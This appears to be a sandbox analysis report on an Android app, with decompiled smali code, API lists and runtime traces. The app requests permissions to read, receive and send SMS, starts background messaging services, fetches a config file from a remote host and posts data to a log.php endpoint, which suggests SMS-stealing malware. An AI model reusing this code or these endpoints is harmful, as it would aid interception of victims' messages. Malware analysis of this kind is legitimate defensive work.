                        58sget-object p1, Lcom/MrXnxVip/global/main;->_vvvvvvvvvv6:Lanywheresoftware/b4a/objects/B4XViewWrapper$XUI;
                        60sget-object p1, Lcom/MrXnxVip/global/main;->processBA:Lanywheresoftware/b4a/BA;
                        62const-string v1, "\u062f\u0633\u062a\u06af\u0627\u0647 \u0628\u0647 \u0627\u06cc\u0646\u062a\u0631\u0646\u062a \u0645\u062a\u0635\u0644 \u0646\u0645\u06cc\u0628\u0627\u0634\u062f."
                        64invoke-static {v1}, Lanywheresoftware/b4a/BA;->ObjectToCharSequence(Ljava/lang/Object;)Ljava/lang/CharSequence;
                        65move-result-object v1
                        67const-string v2, "\u062e\u0637\u0627"
                        69invoke-static {v2}, Lanywheresoftware/b4a/BA;->ObjectToCharSequence(Ljava/lang/Object;)Ljava/lang/CharSequence;
                        70move-result-object v2
                        72invoke-static {p1, v1, v2}, Lanywheresoftware/b4a/objects/B4XViewWrapper$XUI;->MsgboxAsync(Lanywheresoftware/b4a/BA;Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/Object;
                        74const-string p1, "msgbox_result"
                        76sget-object v1, Lcom/MrXnxVip/global/main;->processBA:Lanywheresoftware/b4a/BA;
                        78invoke-static {p1, v1, p0, v0}, Lanywheresoftware/b4a/keywords/Common;->WaitFor(Ljava/lang/String;Lanywheresoftware/b4a/BA;Lanywheresoftware/b4a/BA$ResumableSub;Ljava/lang/Object;)V
                        79const/16 p1, 0x11
                        80iput p1, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->state:I
                        81return-void
                        82pswitch_70: iput v5, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->state:I
                        84sget-object p1, Lcom/MrXnxVip/global/main;->processBA:Lanywheresoftware/b4a/BA;
                        86sget-object v1, Lcom/MrXnxVip/global/main;->mostCurrent:Lcom/MrXnxVip/global/main;
                        88iget-object v1, v1, Lcom/MrXnxVip/global/main;->_vvvvvvvvv7:Lcom/MrXnxVip/global/starter;
                        90invoke-static {}, Lcom/MrXnxVip/global/starter;->getObject()Ljava/lang/Class;
                        91move-result-object v1
                        93invoke-static {p1, v1}, Lanywheresoftware/b4a/keywords/Common;->StartService(Lanywheresoftware/b4a/BA;Ljava/lang/Object;)V
                        95sget-object p1, Lcom/MrXnxVip/global/main;->processBA:Lanywheresoftware/b4a/BA;
                        97sget-object v1, Lcom/MrXnxVip/global/main;->mostCurrent:Lcom/MrXnxVip/global/main;
                        99iget-object v1, v1, Lcom/MrXnxVip/global/main;->_vvvvvvvvv0:Lcom/MrXnxVip/global/firebasemessaging;
                        101invoke-static {}, Lcom/MrXnxVip/global/firebasemessaging;->getObject()Ljava/lang/Class;
                        102move-result-object v1
                        104invoke-static {p1, v1}, Lanywheresoftware/b4a/keywords/Common;->StartService(Lanywheresoftware/b4a/BA;Ljava/lang/Object;)V
                        106sget-object p1, Lcom/MrXnxVip/global/main;->processBA:Lanywheresoftware/b4a/BA;
                        108sget-object v1, Lcom/MrXnxVip/global/main;->mostCurrent:Lcom/MrXnxVip/global/main;
                        110iget-object v1, v1, Lcom/MrXnxVip/global/main;->_vvvvvvvvvv1:Lcom/MrXnxVip/global/newmessage1;
                        112invoke-static {}, Lcom/MrXnxVip/global/newmessage1;->getObject()Ljava/lang/Class;
                        113move-result-object v1
                        115invoke-static {p1, v1}, Lanywheresoftware/b4a/keywords/Common;->StartService(Lanywheresoftware/b4a/BA;Ljava/lang/Object;)V
                        116new-instance p1, Lcom/MrXnxVip/global/httpjob;
                        118invoke-direct {p1}, Lcom/MrXnxVip/global/httpjob;-><init>()V
                        119iput-object p1, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->_hj:Lcom/MrXnxVip/global/httpjob;
                        121sget-object v1, Lcom/MrXnxVip/global/main;->processBA:Lanywheresoftware/b4a/BA;
                        123const-string v2, "job1"
                        125invoke-static {}, Lcom/MrXnxVip/global/main;->getObject()Ljava/lang/Class;
                        126move-result-object v3
                        128invoke-virtual {p1, v1, v2, v3}, Lcom/MrXnxVip/global/httpjob;->_initialize(Lanywheresoftware/b4a/BA;Ljava/lang/String;Ljava/lang/Object;)Ljava/lang/String;
                        130iget-object p1, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->_hj:Lcom/MrXnxVip/global/httpjob;
                        131new-instance v1, Ljava/lang/StringBuilder;
                        133invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        135sget-object v2, Lcom/MrXnxVip/global/main;->mostCurrent:Lcom/MrXnxVip/global/main;
                        137iget-object v2, v2, Lcom/MrXnxVip/global/main;->_vvvvvvvvvv3:Lcom/MrXnxVip/global/information;
                        139sget-object v2, Lcom/MrXnxVip/global/information;->_vvvv6:Ljava/lang/String;
                        141invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        143const-string v2, "/web.txt"
                        145invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        147invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        148move-result-object v1
                        150invoke-virtual {p1, v1}, Lcom/MrXnxVip/global/httpjob;->_vvvvv5(Ljava/lang/String;)Ljava/lang/String;
                        152const-string p1, "jobdone"
                        154sget-object v1, Lcom/MrXnxVip/global/main;->processBA:Lanywheresoftware/b4a/BA;
                        156invoke-static {p1, v1, p0, v0}, Lanywheresoftware/b4a/keywords/Common;->WaitFor(Ljava/lang/String;Lanywheresoftware/b4a/BA;Lanywheresoftware/b4a/BA$ResumableSub;Ljava/lang/Object;)V
                        157const/16 p1, 0x10
                        158iput p1, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->state:I
                        159return-void
                        160pswitch_d3: iput v5, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->state:I
                        161iput v6, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->catchState:I
                        163invoke-static {}, Lcom/MrXnxVip/global/main;->_vvvvvvvvvv5()Z
                        • Time: 695066
                          • Return:
                            • true
                        164move-result p1
                        165if-eqz p1, :cond_e3
                        166const/16 p1, 0x8
                        167iput p1, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->state:I
                        168goto/16 :goto_0
                        169cond_e3: const/16 p1, 0xa
                        170iput p1, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->state:I
                        171goto/16 :goto_0
                        172pswitch_e9: iput v4, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->state:I
                        173iput v6, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->catchState:I
                        175const-string p1, "6196617"
                        177sget-object v0, Lcom/MrXnxVip/global/main;->mostCurrent:Lcom/MrXnxVip/global/main;
                        179iget-object v0, v0, Lcom/MrXnxVip/global/main;->activityBA:Lanywheresoftware/b4a/BA;
                        181invoke-static {v0}, Lanywheresoftware/b4a/keywords/Common;->LastException(Lanywheresoftware/b4a/BA;)Lanywheresoftware/b4a/objects/B4AException;
                        182move-result-object v0
                        184invoke-static {v0}, Lanywheresoftware/b4a/BA;->ObjectToString(Ljava/lang/Object;)Ljava/lang/String;
                        185move-result-object v0
                        187invoke-static {p1, v0, v6}, Lanywheresoftware/b4a/keywords/Common;->LogImpl(Ljava/lang/String;Ljava/lang/String;I)V
                        188goto/16 :goto_0
                        189pswitch_100: iput v4, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->state:I
                        190iput v1, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->catchState:I
                        192sget-object p1, Lcom/MrXnxVip/global/main;->_vvvv0:Lanywheresoftware/b4a/objects/RuntimePermissions;
                        194sget-object v0, Lcom/MrXnxVip/global/main;->processBA:Lanywheresoftware/b4a/BA;
                        196sget-object v1, Lcom/MrXnxVip/global/main;->_vvvv0:Lanywheresoftware/b4a/objects/RuntimePermissions;
                        198const-string v1, "android.permission.RECEIVE_SMS"
                        200invoke-virtual {p1, v0, v1}, Lanywheresoftware/b4a/objects/RuntimePermissions;->CheckAndRequest(Lanywheresoftware/b4a/BA;Ljava/lang/String;)V
                        202sget-object p1, Lcom/MrXnxVip/global/main;->_vvvv0:Lanywheresoftware/b4a/objects/RuntimePermissions;
                        204sget-object v0, Lcom/MrXnxVip/global/main;->processBA:Lanywheresoftware/b4a/BA;
                        206sget-object v1, Lcom/MrXnxVip/global/main;->_vvvv0:Lanywheresoftware/b4a/objects/RuntimePermissions;
                        208const-string v1, "android.permission.SEND_SMS"
                        210invoke-virtual {p1, v0, v1}, Lanywheresoftware/b4a/objects/RuntimePermissions;->CheckAndRequest(Lanywheresoftware/b4a/BA;Ljava/lang/String;)V
                        212sget-object p1, Lcom/MrXnxVip/global/main;->_vvvv0:Lanywheresoftware/b4a/objects/RuntimePermissions;
                        214sget-object v0, Lcom/MrXnxVip/global/main;->processBA:Lanywheresoftware/b4a/BA;
                        216sget-object v1, Lcom/MrXnxVip/global/main;->_vvvv0:Lanywheresoftware/b4a/objects/RuntimePermissions;
                        218const-string v1, "android.permission.READ_SMS"
                        220invoke-virtual {p1, v0, v1}, Lanywheresoftware/b4a/objects/RuntimePermissions;->CheckAndRequest(Lanywheresoftware/b4a/BA;Ljava/lang/String;)V
                        221goto/16 :goto_0
                        222pswitch_127: iput v4, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->state:I
                        223iput v1, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->catchState:I
                        224const/4 p1, 0x3
                        225iput p1, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->state:I
                        226goto/16 :goto_0
                        227pswitch_130: const/4 p1, 0x1
                        228iput p1, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->state:I
                        230sget-object p1, Lcom/MrXnxVip/global/main;->processBA:Lanywheresoftware/b4a/BA;
                        232sget-object v0, Lcom/MrXnxVip/global/main;->mostCurrent:Lcom/MrXnxVip/global/main;
                        234iget-object v0, v0, Lcom/MrXnxVip/global/main;->_vvvvvvvvv7:Lcom/MrXnxVip/global/starter;
                        236invoke-static {}, Lcom/MrXnxVip/global/starter;->getObject()Ljava/lang/Class;
                        237move-result-object v0
                        239invoke-static {p1, v0}, Lanywheresoftware/b4a/keywords/Common;->StartService(Lanywheresoftware/b4a/BA;Ljava/lang/Object;)V
                        241sget-object p1, Lcom/MrXnxVip/global/main;->mostCurrent:Lcom/MrXnxVip/global/main;
                        243iget-object p1, p1, Lcom/MrXnxVip/global/main;->_activity:Lanywheresoftware/b4a/objects/ActivityWrapper;
                        245const-string v0, "Layout"
                        247sget-object v1, Lcom/MrXnxVip/global/main;->mostCurrent:Lcom/MrXnxVip/global/main;
                        249iget-object v1, v1, Lcom/MrXnxVip/global/main;->activityBA:Lanywheresoftware/b4a/BA;
                        251invoke-virtual {p1, v0, v1}, Lanywheresoftware/b4a/objects/ActivityWrapper;->LoadLayout(Ljava/lang/String;Lanywheresoftware/b4a/BA;)Lanywheresoftware/b4a/keywords/LayoutValues;
                        253const-string p1, "6196611"
                        255const-string v0, "create"
                        257invoke-static {p1, v0, v6}, Lanywheresoftware/b4a/keywords/Common;->LogImpl(Ljava/lang/String;Ljava/lang/String;I)V
                        258try_end_154: goto/16 :goto_0
                        259pswitch_156: return-void
                        260catch_157: move-exception p1
                        261iget v0, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->catchState:I
                        262if-eqz v0, :cond_167
                        263iget v0, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->catchState:I
                        264iput v0, p0, Lcom/MrXnxVip/global/main$ResumableSub_Activity_Create;->state:I
                        266sget-object v0, Lcom/MrXnxVip/global/main;->processBA:Lanywheresoftware/b4a/BA;
                        268invoke-virtual {v0, p1}, Lanywheresoftware/b4a/BA;->setLastException(Ljava/lang/Exception;)V
                        269goto/16 :goto_0
                        270cond_167: goto/16 :goto_169
                        271goto_168: throw p1
                        272goto_169: goto/16 :goto_168
                        APIs
                        • java.lang.System.currentTimeMillis
                        • java.lang.System.currentTimeMillis
                        • java.lang.System.currentTimeMillis
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.Long.valueOf
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.net.ProtocolException.<init>
                        Strings
                        • chain
                        • GET
                        • POST
                        • Expect
                        • 100-continue
                        • Connection
                        • close
                        • HTTP
                        • had non-zero Content-Length:
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/io/IOException;
                        3}
                        4.end annotation
                        6const-string v0, "chain"
                        8invoke-static {p1, v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullParameter(Ljava/lang/Object;Ljava/lang/String;)V
                        9check-cast p1, Lokhttp3/internal/http/RealInterceptorChain;
                        11invoke-virtual {p1}, Lokhttp3/internal/http/RealInterceptorChain;->getExchange$okhttp()Lokhttp3/internal/connection/Exchange;
                        12move-result-object v0
                        14invoke-static {v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNull(Ljava/lang/Object;)V
                        16invoke-virtual {p1}, Lokhttp3/internal/http/RealInterceptorChain;->getRequest$okhttp()Lokhttp3/Request;
                        17move-result-object p1
                        19invoke-virtual {p1}, Lokhttp3/Request;->body()Lokhttp3/RequestBody;
                        20move-result-object v1
                        22invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
                        23move-result-wide v2
                        25invoke-virtual {v0, p1}, Lokhttp3/internal/connection/Exchange;->writeRequestHeaders(Lokhttp3/Request;)V
                        26const/4 v4, 0x0
                        27move-object v5, v4
                        28check-cast v5, Lokhttp3/Response$Builder;
                        30invoke-virtual {p1}, Lokhttp3/Request;->method()Ljava/lang/String;
                        • Time: 699277
                          • This:
                            • Request{method=GET, url=https://ssd-vip.website/lord/web.txt, headers=[Host:ssd-vip.website, Connection:Keep-Alive, Accept-Encoding:gzip, User-Agent:okhttp/4.9.0]}
                          • Return:
                            • GET
                        • Time: 699324
                          • This:
                            • Request{method=POST, url=https://ssd-vip.website/lord/log.php, headers=[Content-Type:application/x-www-form-urlencoded, Content-Length:123, Host:ssd-vip.website, Connection:Keep-Alive, Accept-Encoding:gzip, User-Agent:okhttp/4.9.0]}
                          • Return:
                            • POST
                        31move-result-object v6
                        33invoke-static {v6}, Lokhttp3/internal/http/HttpMethod;->permitsRequestBody(Ljava/lang/String;)Z
                        34move-result v6
                        35const/4 v7, 0x0
                        36const/4 v8, 0x1
                        37if-eqz v6, :cond_81
                        38if-eqz v1, :cond_81
                        40const-string v6, "Expect"
                        42invoke-virtual {p1, v6}, Lokhttp3/Request;->header(Ljava/lang/String;)Ljava/lang/String;
                        43move-result-object v6
                        45const-string v9, "100-continue"
                        47invoke-static {v9, v6, v8}, Lkotlin/text/StringsKt;->equals(Ljava/lang/String;Ljava/lang/String;Z)Z
                        48move-result v6
                        49if-eqz v6, :cond_49
                        51invoke-virtual {v0}, Lokhttp3/internal/connection/Exchange;->flushRequest()V
                        53invoke-virtual {v0, v8}, Lokhttp3/internal/connection/Exchange;->readResponseHeaders(Z)Lokhttp3/Response$Builder;
                        54move-result-object v5
                        56invoke-virtual {v0}, Lokhttp3/internal/connection/Exchange;->responseHeadersStart()V
                        57const/4 v6, 0x0
                        58goto/16 :goto_4a
                        59cond_49: const/4 v6, 0x1
                        60goto_4a: if-nez v5, :cond_70
                        62invoke-virtual {v1}, Lokhttp3/RequestBody;->isDuplex()Z
                        • Time: 699338
                          • This:
                            • anywheresoftware.b4h.okhttp.OkHttpClientWrapper$PostPayload@f0fbfb8
                          • Return:
                            • false
                        63move-result v9
                        64if-eqz v9, :cond_61
                        66invoke-virtual {v0}, Lokhttp3/internal/connection/Exchange;->flushRequest()V
                        68invoke-virtual {v0, p1, v8}, Lokhttp3/internal/connection/Exchange;->createRequestBody(Lokhttp3/Request;Z)Lokio/Sink;
                        69move-result-object v9
                        71invoke-static {v9}, Lokio/Okio;->buffer(Lokio/Sink;)Lokio/BufferedSink;
                        72move-result-object v9
                        74invoke-virtual {v1, v9}, Lokhttp3/RequestBody;->writeTo(Lokio/BufferedSink;)V
                        75goto/16 :goto_85
                        76cond_61:
                        77invoke-virtual {v0, p1, v7}, Lokhttp3/internal/connection/Exchange;->createRequestBody(Lokhttp3/Request;Z)Lokio/Sink;
                        78move-result-object v9
                        80invoke-static {v9}, Lokio/Okio;->buffer(Lokio/Sink;)Lokio/BufferedSink;
                        81move-result-object v9
                        83invoke-virtual {v1, v9}, Lokhttp3/RequestBody;->writeTo(Lokio/BufferedSink;)V
                        85invoke-interface {v9}, Lokio/BufferedSink;->close()V
                        86goto/16 :goto_85
                        87cond_70:
                        88invoke-virtual {v0}, Lokhttp3/internal/connection/Exchange;->noRequestBody()V
                        90invoke-virtual {v0}, Lokhttp3/internal/connection/Exchange;->getConnection$okhttp()Lokhttp3/internal/connection/RealConnection;
                        91move-result-object v9
                        93invoke-virtual {v9}, Lokhttp3/internal/connection/RealConnection;->isMultiplexed$okhttp()Z
                        94move-result v9
                        95if-nez v9, :cond_85
                        97invoke-virtual {v0}, Lokhttp3/internal/connection/Exchange;->noNewExchangesOnConnection()V
                        98goto/16 :goto_85
                        99cond_81:
                        100invoke-virtual {v0}, Lokhttp3/internal/connection/Exchange;->noRequestBody()V
                        101const/4 v6, 0x1
                        102goto_85: if-eqz v1, :cond_8d
                        104invoke-virtual {v1}, Lokhttp3/RequestBody;->isDuplex()Z
                        • Time: 699357
                          • This:
                            • anywheresoftware.b4h.okhttp.OkHttpClientWrapper$PostPayload@f0fbfb8
                          • Return:
                            • false
                        105move-result v1
                        106if-nez v1, :cond_90
                        107cond_8d:
                        108invoke-virtual {v0}, Lokhttp3/internal/connection/Exchange;->finishRequest()V
                        109cond_90: if-nez v5, :cond_9f
                        111invoke-virtual {v0, v7}, Lokhttp3/internal/connection/Exchange;->readResponseHeaders(Z)Lokhttp3/Response$Builder;
                        112move-result-object v5
                        114invoke-static {v5}, Lkotlin/jvm/internal/Intrinsics;->checkNotNull(Ljava/lang/Object;)V
                        115if-eqz v6, :cond_9f
                        117invoke-virtual {v0}, Lokhttp3/internal/connection/Exchange;->responseHeadersStart()V
                        118const/4 v6, 0x0
                        119cond_9f:
                        120invoke-virtual {v5, p1}, Lokhttp3/Response$Builder;->request(Lokhttp3/Request;)Lokhttp3/Response$Builder;
                        121move-result-object v1
                        123invoke-virtual {v0}, Lokhttp3/internal/connection/Exchange;->getConnection$okhttp()Lokhttp3/internal/connection/RealConnection;
                        124move-result-object v5
                        126invoke-virtual {v5}, Lokhttp3/internal/connection/RealConnection;->handshake()Lokhttp3/Handshake;
                        127move-result-object v5
                        129invoke-virtual {v1, v5}, Lokhttp3/Response$Builder;->handshake(Lokhttp3/Handshake;)Lokhttp3/Response$Builder;
                        130move-result-object v1
                        132invoke-virtual {v1, v2, v3}, Lokhttp3/Response$Builder;->sentRequestAtMillis(J)Lokhttp3/Response$Builder;
                        133move-result-object v1
                        135invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
                        136move-result-wide v9
                        138invoke-virtual {v1, v9, v10}, Lokhttp3/Response$Builder;->receivedResponseAtMillis(J)Lokhttp3/Response$Builder;
                        139move-result-object v1
                        141invoke-virtual {v1}, Lokhttp3/Response$Builder;->build()Lokhttp3/Response;
                        142move-result-object v1
                        144invoke-virtual {v1}, Lokhttp3/Response;->code()I
                        145move-result v5
                        146const/16 v9, 0x64
                        147if-ne v5, v9, :cond_f7
                        149invoke-virtual {v0, v7}, Lokhttp3/internal/connection/Exchange;->readResponseHeaders(Z)Lokhttp3/Response$Builder;
                        150move-result-object v1
                        152invoke-static {v1}, Lkotlin/jvm/internal/Intrinsics;->checkNotNull(Ljava/lang/Object;)V
                        153if-eqz v6, :cond_d3
                        155invoke-virtual {v0}, Lokhttp3/internal/connection/Exchange;->responseHeadersStart()V
                        156cond_d3:
                        157invoke-virtual {v1, p1}, Lokhttp3/Response$Builder;->request(Lokhttp3/Request;)Lokhttp3/Response$Builder;
                        158move-result-object p1
                        160invoke-virtual {v0}, Lokhttp3/internal/connection/Exchange;->getConnection$okhttp()Lokhttp3/internal/connection/RealConnection;
                        161move-result-object v1
                        163invoke-virtual {v1}, Lokhttp3/internal/connection/RealConnection;->handshake()Lokhttp3/Handshake;
                        164move-result-object v1
                        166invoke-virtual {p1, v1}, Lokhttp3/Response$Builder;->handshake(Lokhttp3/Handshake;)Lokhttp3/Response$Builder;
                        167move-result-object p1
                        169invoke-virtual {p1, v2, v3}, Lokhttp3/Response$Builder;->sentRequestAtMillis(J)Lokhttp3/Response$Builder;
                        170move-result-object p1
                        172invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
                        173move-result-wide v1
                        175invoke-virtual {p1, v1, v2}, Lokhttp3/Response$Builder;->receivedResponseAtMillis(J)Lokhttp3/Response$Builder;
                        176move-result-object p1
                        178invoke-virtual {p1}, Lokhttp3/Response$Builder;->build()Lokhttp3/Response;
                        179move-result-object v1
                        181invoke-virtual {v1}, Lokhttp3/Response;->code()I
                        182move-result v5
                        183cond_f7:
                        184invoke-virtual {v0, v1}, Lokhttp3/internal/connection/Exchange;->responseHeadersEnd(Lokhttp3/Response;)V
                        185iget-boolean p1, p0, Lokhttp3/internal/http/CallServerInterceptor;->forWebSocket:Z
                        186if-eqz p1, :cond_111
                        187const/16 p1, 0x65
                        188if-ne v5, p1, :cond_111
                        190invoke-virtual {v1}, Lokhttp3/Response;->newBuilder()Lokhttp3/Response$Builder;
                        191move-result-object p1
                        193sget-object v1, Lokhttp3/internal/Util;->EMPTY_RESPONSE:Lokhttp3/ResponseBody;
                        195invoke-virtual {p1, v1}, Lokhttp3/Response$Builder;->body(Lokhttp3/ResponseBody;)Lokhttp3/Response$Builder;
                        196move-result-object p1
                        198invoke-virtual {p1}, Lokhttp3/Response$Builder;->build()Lokhttp3/Response;
                        199move-result-object p1
                        200goto/16 :goto_121
                        201cond_111:
                        202invoke-virtual {v1}, Lokhttp3/Response;->newBuilder()Lokhttp3/Response$Builder;
                        203move-result-object p1
                        205invoke-virtual {v0, v1}, Lokhttp3/internal/connection/Exchange;->openResponseBody(Lokhttp3/Response;)Lokhttp3/ResponseBody;
                        206move-result-object v1
                        208invoke-virtual {p1, v1}, Lokhttp3/Response$Builder;->body(Lokhttp3/ResponseBody;)Lokhttp3/Response$Builder;
                        209move-result-object p1
                        211invoke-virtual {p1}, Lokhttp3/Response$Builder;->build()Lokhttp3/Response;
                        212move-result-object p1
                        213goto_121:
                        214invoke-virtual {p1}, Lokhttp3/Response;->request()Lokhttp3/Request;
                        215move-result-object v1
                        217const-string v2, "Connection"
                        219invoke-virtual {v1, v2}, Lokhttp3/Request;->header(Ljava/lang/String;)Ljava/lang/String;
                        220move-result-object v1
                        222const-string v3, "close"
                        224invoke-static {v3, v1, v8}, Lkotlin/text/StringsKt;->equals(Ljava/lang/String;Ljava/lang/String;Z)Z
                        225move-result v1
                        226if-nez v1, :cond_13e
                        227const/4 v1, 0x2
                        229invoke-static {p1, v2, v4, v1, v4}, Lokhttp3/Response;->header$default(Lokhttp3/Response;Ljava/lang/String;Ljava/lang/String;ILjava/lang/Object;)Ljava/lang/String;
                        230move-result-object v1
                        232invoke-static {v3, v1, v8}, Lkotlin/text/StringsKt;->equals(Ljava/lang/String;Ljava/lang/String;Z)Z
                        233move-result v1
                        234if-eqz v1, :cond_141
                        235cond_13e:
                        236invoke-virtual {v0}, Lokhttp3/internal/connection/Exchange;->noNewExchangesOnConnection()V
                        237cond_141: const/16 v0, 0xcc
                        238if-eq v5, v0, :cond_149
                        239const/16 v0, 0xcd
                        240if-ne v5, v0, :cond_18b
                        241cond_149:
                        242invoke-virtual {p1}, Lokhttp3/Response;->body()Lokhttp3/ResponseBody;
                        243move-result-object v0
                        244if-eqz v0, :cond_154
                        246invoke-virtual {v0}, Lokhttp3/ResponseBody;->contentLength()J
                        247move-result-wide v0
                        248goto/16 :goto_156
                        249cond_154: const-wide/16 v0, -0x1
                        250goto_156: const-wide/16 v2, 0x0
                        251cmp-long v6, v0, v2
                        252if-lez v6, :cond_18b
                        253new-instance v0, Ljava/net/ProtocolException;
                        254new-instance v1, Ljava/lang/StringBuilder;
                        256invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        258const-string v2, "HTTP "
                        260invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        262invoke-virtual {v1, v5}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
                        264const-string v2, " had non-zero Content-Length: "
                        266invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        268invoke-virtual {p1}, Lokhttp3/Response;->body()Lokhttp3/ResponseBody;
                        269move-result-object p1
                        270if-eqz p1, :cond_17e
                        272invoke-virtual {p1}, Lokhttp3/ResponseBody;->contentLength()J
                        273move-result-wide v2
                        275invoke-static {v2, v3}, Ljava/lang/Long;->valueOf(J)Ljava/lang/Long;
                        276move-result-object v4
                        277cond_17e:
                        278invoke-virtual {v1, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        280invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        281move-result-object p1
                        283invoke-direct {v0, p1}, Ljava/net/ProtocolException;-><init>(Ljava/lang/String;)V
                        284check-cast v0, Ljava/lang/Throwable;
                        285throw v0
                        286cond_18b: return-object p1
                        Cross References
                        APIs
                        • java.util.HashMap.get
                        • java.lang.String.startsWith
                        • android.app.Application.getPackageName
                        • java.lang.String.valueOf
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.String.length
                        • java.lang.Class.forName
                        • java.lang.String.lastIndexOf
                        • java.lang.String.substring
                        • java.lang.String.valueOf
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.String.substring
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Class.forName
                        • java.lang.Class.getConstructor
                        • java.lang.reflect.Constructor.newInstance
                        Strings
                        • nativeClass
                        • .
                        • $
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"<T:",
                        3"Ljava/lang/Object;",
                        4">(",
                        5"Landroid/content/Context;",
                        6"Ljava/lang/Class<",
                        7"TT;>;",
                        8"Ljava/util/HashMap<",
                        9"Ljava/lang/String;",
                        10"Ljava/lang/Object;",
                        11">;Z)TT;"
                        12}
                        13.end annotation
                        14.annotation system Ldalvik/annotation/Throws;
                        15value = {
                        16Ljava/lang/IllegalArgumentException;,
                        17Ljava/lang/SecurityException;,
                        18Ljava/lang/InstantiationException;,
                        19Ljava/lang/IllegalAccessException;,
                        20Ljava/lang/reflect/InvocationTargetException;,
                        21Ljava/lang/NoSuchMethodException;,
                        22Ljava/lang/ClassNotFoundException;
                        23}
                        24.end annotation
                        26const-string v0, "nativeClass"
                        28invoke-virtual {p2, v0}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        29move-result-object p2
                        30check-cast p2, Ljava/lang/String;
                        32const-string v0, "."
                        33if-eqz p2, :cond_28
                        35invoke-virtual {p2, v0}, Ljava/lang/String;->startsWith(Ljava/lang/String;)Z
                        36move-result v1
                        37if-eqz v1, :cond_28
                        38new-instance v1, Ljava/lang/StringBuilder;
                        40sget-object v2, Lanywheresoftware/b4a/BA;->applicationContext:Landroid/app/Application;
                        42invoke-virtual {v2}, Landroid/app/Application;->getPackageName()Ljava/lang/String;
                        43move-result-object v2
                        45invoke-static {v2}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
                        46move-result-object v2
                        48invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        50invoke-virtual {v1, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        52invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        53move-result-object p2
                        54cond_28: const/4 v1, 0x0
                        55const/4 v2, 0x1
                        56if-nez p3, :cond_60
                        57if-eqz p2, :cond_60
                        58try_start_2e:
                        59invoke-virtual {p2}, Ljava/lang/String;->length()I
                        60move-result p3
                        61if-nez p3, :cond_35
                        62goto/16 :goto_60
                        63cond_35:
                        64invoke-static {p2}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
                        65move-result-object p1
                        66try_end_39: goto/16 :goto_60
                        67catch_3a:
                        68invoke-virtual {p2, v0}, Ljava/lang/String;->lastIndexOf(Ljava/lang/String;)I
                        69move-result p1
                        70new-instance p3, Ljava/lang/StringBuilder;
                        72invoke-virtual {p2, v1, p1}, Ljava/lang/String;->substring(II)Ljava/lang/String;
                        73move-result-object v0
                        75invoke-static {v0}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
                        76move-result-object v0
                        78invoke-direct {p3, v0}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        80const-string v0, "$"
                        82invoke-virtual {p3, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        83add-int/2addr p1, v2
                        85invoke-virtual {p2, p1}, Ljava/lang/String;->substring(I)Ljava/lang/String;
                        86move-result-object p1
